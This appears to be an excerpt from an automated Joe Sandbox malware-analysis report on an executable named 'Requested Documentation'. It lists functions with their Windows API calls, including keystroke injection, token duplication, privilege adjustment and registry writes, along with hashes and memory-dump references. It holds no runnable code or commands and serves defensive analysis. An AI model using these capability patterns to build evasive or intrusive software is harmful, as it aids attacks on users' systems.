                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: FilePointer
                                                                              • String ID:
                                                                              • API String ID: 973152223-0
                                                                              • Opcode ID: 7d0e2523e8daf464d97297951a70ba3c690a5e8fb8f1eea68e110a0f0540fba1
                                                                              • Instruction ID: 80f07114e4da6c1595e7e41592921ee6d42a7a1d369c111acd544a18160ae7a0
                                                                              • Opcode Fuzzy Hash: 7d0e2523e8daf464d97297951a70ba3c690a5e8fb8f1eea68e110a0f0540fba1
                                                                              • Instruction Fuzzy Hash: DFD0C77464020CBFE710DB80DC46FA9777CD705710F100294FE0466690D6B27D518795
                                                                              Function 009A525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: __wfsopen
                                                                              • String ID:
                                                                              • API String ID: 197181222-0
                                                                              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                              • Instruction ID: 313545fe2c12dc246a5886101145bcce01bd2b9c9cedf8447cf82ad0f3ad62e6
                                                                              • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                              • Instruction Fuzzy Hash: 62B0927654020C77CE012A82EC02B893B199B82764F408020FF1C18172A673A6649AC9
                                                                              Function 009ED07B Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLastError.KERNEL32(00000002,00000000), ref: 009ED1FF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1452528299-0
                                                                              • Opcode ID: a284040700a36a68c951b7daf05a3a5d2e0a69a81d27929d3e5c0fac64732519
                                                                              • Instruction ID: 5774685258331a87032767b27de957923155e0db95fa5d9f141d7179cb785aaf
                                                                              • Opcode Fuzzy Hash: a284040700a36a68c951b7daf05a3a5d2e0a69a81d27929d3e5c0fac64732519
                                                                              • Instruction Fuzzy Hash: 72716D342093428FCB05EF65C491B6AB7E4AFC9314F54492DF9969B3A2DB30ED09CB52
                                                                              Function 009A0C08 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                              • Instruction ID: c048a491aa4dda3c151c4b743e51f194991c5e9b4d2e4cf0dd18b9d468774a92
                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                              • Instruction Fuzzy Hash: 3331B370A001059BC718DF58C484A69FBBAFB9A320B64C7A5E88ACB355D735EDD1DBC0
                                                                              Function 0130229C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • Sleep.KERNELBASE(000001F4), ref: 013022B1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1739276238.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                              • Instruction ID: c424e505f08011f398819ff39963a4836e64d88ae0f1a8fa881cd00f41a8d686
                                                                              • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                              • Instruction Fuzzy Hash: 5EE09A7494010EAFDB00EFA4D54969E7BB4EF04311F1005A1FD0596681DA319A548A62
                                                                              Function 013022A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • Sleep.KERNELBASE(000001F4), ref: 013022B1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1739276238.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                              • Instruction ID: a0f9273c6febfcedb835bc99cf963694c85b9f67ff78ba10af719879b9132be2
                                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                              • Instruction Fuzzy Hash: D8E0BF7494010E9FDB00EFA4D54969E7BB4EF04301F100161FD0592281D63199508A62

                                                                              Non-executed Functions

                                                                              Function 00A0CABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623
                                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00A0CB37
                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A0CB95
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A0CBD6
                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A0CC00
                                                                              • SendMessageW.USER32 ref: 00A0CC29
                                                                              • _wcsncpy.LIBCMT ref: 00A0CC95
                                                                              • GetKeyState.USER32(00000011), ref: 00A0CCB6
                                                                              • GetKeyState.USER32(00000009), ref: 00A0CCC3
                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A0CCD9
                                                                              • GetKeyState.USER32(00000010), ref: 00A0CCE3
                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A0CD0C
                                                                              • SendMessageW.USER32 ref: 00A0CD33
                                                                              • SendMessageW.USER32(?,00001030,?,00A0B348), ref: 00A0CE37
                                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00A0CE4D
                                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00A0CE60
                                                                              • SetCapture.USER32(?), ref: 00A0CE69
                                                                              • ClientToScreen.USER32(?,?), ref: 00A0CECE
                                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00A0CEDB
                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A0CEF5
                                                                              • ReleaseCapture.USER32 ref: 00A0CF00
                                                                              • GetCursorPos.USER32(?), ref: 00A0CF3A
                                                                              • ScreenToClient.USER32(?,?), ref: 00A0CF47
                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00A0CFA3
                                                                              • SendMessageW.USER32 ref: 00A0CFD1
                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00A0D00E
                                                                              • SendMessageW.USER32 ref: 00A0D03D
                                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00A0D05E
                                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00A0D06D
                                                                              • GetCursorPos.USER32(?), ref: 00A0D08D
                                                                              • ScreenToClient.USER32(?,?), ref: 00A0D09A
                                                                              • GetParent.USER32(?), ref: 00A0D0BA
                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00A0D123
                                                                              • SendMessageW.USER32 ref: 00A0D154
                                                                              • ClientToScreen.USER32(?,?), ref: 00A0D1B2
                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00A0D1E2
                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00A0D20C
                                                                              • SendMessageW.USER32 ref: 00A0D22F
                                                                              • ClientToScreen.USER32(?,?), ref: 00A0D281
                                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00A0D2B5
                                                                                • Part of subcall function 009825DB: GetWindowLongW.USER32(?,000000EB), ref: 009825EC
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A0D351
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                              • String ID: @GUI_DRAGID$F
                                                                              • API String ID: 3977979337-4164748364
                                                                              • Opcode ID: 7ef1d97c0349beff3b9b15267b8fc9a494a3393d29e08fb33468fb3692db3e3f
                                                                              • Instruction ID: 81f8e168e315397b41db7e91301fbda94f5636858b57eb1b464ff84e3cc3b6c3
                                                                              • Opcode Fuzzy Hash: 7ef1d97c0349beff3b9b15267b8fc9a494a3393d29e08fb33468fb3692db3e3f
                                                                              • Instruction Fuzzy Hash: 5442CE78604348AFD720CF68E844BAABBE5FF8A320F140A29F555972F1D731D842DB52
                                                                              Function 00996F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove$_memset
                                                                              • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                              • API String ID: 1357608183-1798697756
                                                                              • Opcode ID: db96b5ebb3f2e1f60c7afc6587aa08a57c5ff0810a95875adcd2bf4742e8d929
                                                                              • Instruction ID: e53ee05c59651e5175507fccc39891d310ad296d031e76039e2bfbf109019777
                                                                              • Opcode Fuzzy Hash: db96b5ebb3f2e1f60c7afc6587aa08a57c5ff0810a95875adcd2bf4742e8d929
                                                                              • Instruction Fuzzy Hash: 9A93AF71A44219DBDF24CFA8C881BADB7B5FF58310F24C56AE945AB380E7749E81CB50
                                                                              Function 009848D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetForegroundWindow.USER32(00000000,?), ref: 009848DF
                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009BD665
                                                                              • IsIconic.USER32(?), ref: 009BD66E
                                                                              • ShowWindow.USER32(?,00000009), ref: 009BD67B
                                                                              • SetForegroundWindow.USER32(?), ref: 009BD685
                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 009BD69B
                                                                              • GetCurrentThreadId.KERNEL32 ref: 009BD6A2
                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 009BD6AE
                                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 009BD6BF
                                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 009BD6C7
                                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 009BD6CF
                                                                              • SetForegroundWindow.USER32(?), ref: 009BD6D2
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 009BD6E7
                                                                              • keybd_event.USER32(00000012,00000000), ref: 009BD6F2
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 009BD6FC
                                                                              • keybd_event.USER32(00000012,00000000), ref: 009BD701
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 009BD70A
                                                                              • keybd_event.USER32(00000012,00000000), ref: 009BD70F
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 009BD719
                                                                              • keybd_event.USER32(00000012,00000000), ref: 009BD71E
                                                                              • SetForegroundWindow.USER32(?), ref: 009BD721
                                                                              • AttachThreadInput.USER32(?,?,00000000), ref: 009BD748
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                              • String ID: Shell_TrayWnd
                                                                              • API String ID: 4125248594-2988720461
                                                                              • Opcode ID: 44542af3a25613ae8cdde2b5f3d8f7b228a3911d7f7cd2a0ff3b0025ac444157
                                                                              • Instruction ID: aec49e8ae55e99c15a129c95676be8950d4e195672ddb2fc52ade6ea61eb0687
                                                                              • Opcode Fuzzy Hash: 44542af3a25613ae8cdde2b5f3d8f7b228a3911d7f7cd2a0ff3b0025ac444157
                                                                              • Instruction Fuzzy Hash: A2315871A4131CBEEB315BA19C89FBF7F6CEB44B60F104025FA04F61D1DA715902ABA1
                                                                              Function 009D8310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 009D87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009D882B
                                                                                • Part of subcall function 009D87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009D8858
                                                                                • Part of subcall function 009D87E1: GetLastError.KERNEL32 ref: 009D8865
                                                                              • _memset.LIBCMT ref: 009D8353
                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 009D83A5
                                                                              • CloseHandle.KERNEL32(?), ref: 009D83B6
                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009D83CD
                                                                              • GetProcessWindowStation.USER32 ref: 009D83E6
                                                                              • SetProcessWindowStation.USER32(00000000), ref: 009D83F0
                                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 009D840A
                                                                                • Part of subcall function 009D81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009D8309), ref: 009D81E0
                                                                                • Part of subcall function 009D81CB: CloseHandle.KERNEL32(?,?,009D8309), ref: 009D81F2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                              • String ID: $default$winsta0
                                                                              • API String ID: 2063423040-1027155976
                                                                              • Opcode ID: 573245b6af9328f8075c999709f905f3e6d80929fe45a0d55ab6d847affd4034
                                                                              • Instruction ID: f4c78fde772f585e14f5e972ed11679364efe57a599b6a2a4749f62d52e1a1eb
                                                                              • Opcode Fuzzy Hash: 573245b6af9328f8075c999709f905f3e6d80929fe45a0d55ab6d847affd4034
                                                                              • Instruction Fuzzy Hash: 258149B1940249AFDF11DFA4DC45AEFBB78EF04304F1481AAF914A6262DB318A16DB60
                                                                              Function 009EC75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 009EC78D
                                                                              • FindClose.KERNEL32(00000000), ref: 009EC7E1
                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009EC806
                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009EC81D
                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 009EC844
                                                                              • __swprintf.LIBCMT ref: 009EC890
                                                                              • __swprintf.LIBCMT ref: 009EC8D3
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                              • __swprintf.LIBCMT ref: 009EC927
                                                                                • Part of subcall function 009A3698: __woutput_l.LIBCMT ref: 009A36F1
                                                                              • __swprintf.LIBCMT ref: 009EC975
                                                                                • Part of subcall function 009A3698: __flsbuf.LIBCMT ref: 009A3713
                                                                                • Part of subcall function 009A3698: __flsbuf.LIBCMT ref: 009A372B
                                                                              • __swprintf.LIBCMT ref: 009EC9C4
                                                                              • __swprintf.LIBCMT ref: 009ECA13
                                                                              • __swprintf.LIBCMT ref: 009ECA62
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                              • API String ID: 3953360268-2428617273
                                                                              • Opcode ID: 62b46aad96f801444e0d0e5216c180a1dd8a3b573ad22c9d71e26fb82c4e75dc
                                                                              • Instruction ID: ae87b6ca1fe660e957fa02926dd9a3a3cab336a03a778b31e5b513f0d1e3ac5f
                                                                              • Opcode Fuzzy Hash: 62b46aad96f801444e0d0e5216c180a1dd8a3b573ad22c9d71e26fb82c4e75dc
                                                                              • Instruction Fuzzy Hash: 41A13CB1408344ABC750FFA4C886EBFB7ECBFD8704F440919F59596291EA34DA09CB62
                                                                              Function 009EEF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 009EEFB6
                                                                              • _wcscmp.LIBCMT ref: 009EEFCB
                                                                              • _wcscmp.LIBCMT ref: 009EEFE2
                                                                              • GetFileAttributesW.KERNEL32(?), ref: 009EEFF4
                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 009EF00E
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 009EF026
                                                                              • FindClose.KERNEL32(00000000), ref: 009EF031
                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 009EF04D
                                                                              • _wcscmp.LIBCMT ref: 009EF074
                                                                              • _wcscmp.LIBCMT ref: 009EF08B
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 009EF09D
                                                                              • SetCurrentDirectoryW.KERNEL32(00A38920), ref: 009EF0BB
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 009EF0C5
                                                                              • FindClose.KERNEL32(00000000), ref: 009EF0D2
                                                                              • FindClose.KERNEL32(00000000), ref: 009EF0E4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                              • String ID: *.*
                                                                              • API String ID: 1803514871-438819550
                                                                              • Opcode ID: 840a5a8497ab773ef5b19cdf929117b2de68c5d416528ba3d8830de7a1203e11
                                                                              • Instruction ID: 09ab7d8adc5c107f4a6bc89f3c24896b86c62a3c79f3eb09a9c155b034524b8e
                                                                              • Opcode Fuzzy Hash: 840a5a8497ab773ef5b19cdf929117b2de68c5d416528ba3d8830de7a1203e11
                                                                              • Instruction Fuzzy Hash: DC31C03250124C7ECB25EBA5EC58BEE77ACAF49361F104576F804E2091DB74DE46CA61
                                                                              Function 00A00857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A00953
                                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,00A0F910,00000000,?,00000000,?,?), ref: 00A009C1
                                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00A00A09
                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00A00A92
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00A00DB2
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00A00DBF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Close$ConnectCreateRegistryValue
                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                              • API String ID: 536824911-966354055
                                                                              • Opcode ID: 1c973e098d1cc5fdd80d2e1dab931715f3396182eee0feec1a3c7639230be93e
                                                                              • Instruction ID: 4f98e14445f76cb9cfaa2fb9683c61fdcbe37d7c4b180b12bb216cccfd22df10
                                                                              • Opcode Fuzzy Hash: 1c973e098d1cc5fdd80d2e1dab931715f3396182eee0feec1a3c7639230be93e
                                                                              • Instruction Fuzzy Hash: 7B0225756006059FCB14EF28D891F2AB7E5BF89314F04885CF88A9B3A2DB30ED45CB91
                                                                              Function 009EF0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 009EF113
                                                                              • _wcscmp.LIBCMT ref: 009EF128
                                                                              • _wcscmp.LIBCMT ref: 009EF13F
                                                                                • Part of subcall function 009E4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 009E43A0
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 009EF16E
                                                                              • FindClose.KERNEL32(00000000), ref: 009EF179
                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 009EF195
